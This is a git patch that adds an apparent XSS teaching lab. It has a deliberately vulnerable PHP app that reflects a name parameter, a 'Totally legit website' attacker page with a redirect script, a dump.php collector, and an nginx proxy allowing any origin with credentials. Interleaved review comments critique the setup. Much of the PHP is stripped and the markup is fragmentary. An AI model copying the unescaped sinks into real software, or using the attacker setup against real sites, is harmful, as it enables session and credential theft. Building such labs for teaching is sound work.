From c72b7b3b7f65990412cfd941316e252ea4c32773 Mon Sep 17 00:00:00 2001
From: Daniel-I-Am
Date: Tue, 23 Nov 2021 18:24:38 +0100
Subject: [PATCH] Add demo XSS application
---
app/index.php | 41 +++++++++++++++++++++++++++
app/login.php | 28 +++++++++++++++++++
docker-compose.yml | 17 ++++++++++++
malicious/dump.php | 3 ++
malicious/index.php | 20 +++++++++++++
proxy.conf | 68 +++++++++++++++++++++++++++++++++++++++++++++
6 files changed, 177 insertions(+)
create mode 100644 app/index.php
create mode 100644 app/login.php
create mode 100644 docker-compose.yml
create mode 100644 malicious/dump.php
create mode 100644 malicious/index.php
create mode 100644 proxy.conf
diff --git a/app/index.php b/app/index.php
new file mode 100644
index 0000000..add697c
--- /dev/null
+++ b/app/index.php
@@ -0,0 +1,41 @@
+ + + + + + + + + SBD XSS | Home + + + +
Hey , how are you doing?
+
Enjoy this picture:
+
+
+ + +
+ Hey, what's your name? +
+
+ + +
+ + +
I know you are logged in as
+ + +
diff --git a/app/login.php b/app/login.php
new file mode 100644
index 0000000..36255df
--- /dev/null
+++ b/app/login.php
@@ -0,0 +1,28 @@
+ + + + + + + + SBD XSS | Login + + +
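Review bot: The two output sites in this hunk (`Hey , how are you doing?` on the greeting line and `I know you are logged in as` near the end) carry no marker that the reflection is intentional, and because the PHP was stripped from this rendering I can only infer from malicious/index.php's `window.location.href='/?name=Blegh'` that the echoed value comes from the `name` query parameter. For a deliberately vulnerable teaching app the sink should be labelled in the source so it is not copied into real code, e.g. a comment beside the echo reading `/* INTENTIONAL XSS SINK for the demo; a real application would output htmlspecialchars($name, ENT_QUOTES, 'UTF-8') */`. The same labelling applies to the login.php hunk if it is what stores the name, which I cannot confirm from what is visible here.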
+ Hey, what's your name? +
+
+ + +
+ + +
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..815a601
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,17 @@
+version: "3.8"
+services:
+ app:
+ image: php:8.0-apache
+ volumes:
+ - "./app:/var/www/html/"
+ malicious:
+ image: php:8.0-apache
+ volumes:
+ - "./malicious:/var/www/html/"
+ proxy:
+ image: nginx
+ ports:
+ - "8080:8080"
+ - "8081:8081"
+ volumes:
+ - "./proxy.conf:/etc/nginx/nginx.conf:ro"
diff --git a/malicious/dump.php b/malicious/dump.php
new file mode 100644
index 0000000..6f2371d
--- /dev/null
+++ b/malicious/dump.php
@@ -0,0 +1,3 @@
+ {window.location.href='/?name=Blegh';}); +EOS + +?> + + + + + + + + Totally legit website + + + This link has a nice picture + +
diff --git a/proxy.conf b/proxy.conf
new file mode 100644
index 0000000..f75a2be
--- /dev/null
+++ b/proxy.conf
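Review bot: The `./app` and `./malicious` bind mounts are read-write while `./proxy.conf` is mounted `:ro`; for a deliberately vulnerable app that is a host-side exposure, because anything that obtains file-write inside the container can edit the checked-in source on the host. Unless dump.php needs to write into its document root (its body is not readable in this rendering), `- "./app:/var/www/html/:ro"` and the matching line for `malicious` keep the demo working while closing that path. The `nginx` and `php:8.0-apache` image references are floating tags, so the lab is not reproducible across pulls; pinning each to a full version tag or an image digest would make the environment stable for everyone running the demo.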
@@ -0,0 +1,68 @@
+user nginx;
+worker_processes auto;
+
+error_log /var/log/nginx/error.log notice;
+pid /var/run/nginx.pid;
+
+events {
+ worker_connections 1024;
+ }
+
+http {
+ include /etc/nginx/mime.types;
+ default_type application/octet-stream;
+
+ log_format main '$remote_addr - $remote_user [$time_local] "$request" '
+ '$status $body_bytes_sent "$http_referer" '
+ '"$http_user_agent" "$http_x_forwarded_for"';
+
+ access_log /var/log/nginx/access.log main;
+
+ sendfile on;
+ #tcp_nopush on;
+
+ keepalive_timeout 65;
+
+ #gzip on;
+
+ include /etc/nginx/conf.d/*.conf;
+
+ upstream app {
+ server app:80;
+ }
+
+ upstream malicious {
+ server malicious:80;
+ }
+
+ server {
+ listen 8080;
+
+ location / {
+ proxy_set_header X-Forwarded-Host $host;
+ proxy_set_header X-Forwarded-Server $host;
+ proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ proxy_set_header X-Forwarded-Proto $scheme;
+ proxy_set_header X-Real-IP $remote_addr;
+ proxy_set_header Host $host;
+ proxy_pass "http://app";
+ }
+ }
+
+ server {
+ listen 8081;
+
+ location / {
+ add_header 'Access-Control-Allow-Origin' '*';
+ add_header 'Access-Control-Allow-Credentials' 'true';
+
+ proxy_set_header X-Forwarded-Host $host;
+ proxy_set_header X-Forwarded-Server $host;
+ proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ proxy_set_header X-Forwarded-Proto $scheme;
+ proxy_set_header X-Real-IP $remote_addr;
+ proxy_set_header Host $host;
+ proxy_pass "http://malicious";
+ }
+ }
+}
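Review bot: Both `location /` blocks set `X-Forwarded-For $proxy_add_x_forwarded_for`, which appends to whatever `X-Forwarded-For` the client already sent, so the upstream PHP apps cannot distinguish a spoofed chain from a genuine one; if this proxy is the only trusted hop in the lab, `proxy_set_header X-Forwarded-For $remote_addr;` gives them a value they can rely on. `X-Forwarded-Host`, `X-Forwarded-Server` and `Host` are all populated from `$host`, which nginx takes from the request itself, so a short comment such as `# forwarded headers are client-controlled; only X-Real-IP is set by the proxy` would stop the file being copied with the assumption that they are trustworthy. The six `proxy_set_header` lines are duplicated verbatim across the two servers; moving them into one snippet pulled into both locations with `include` would keep the two copies from drifting apart.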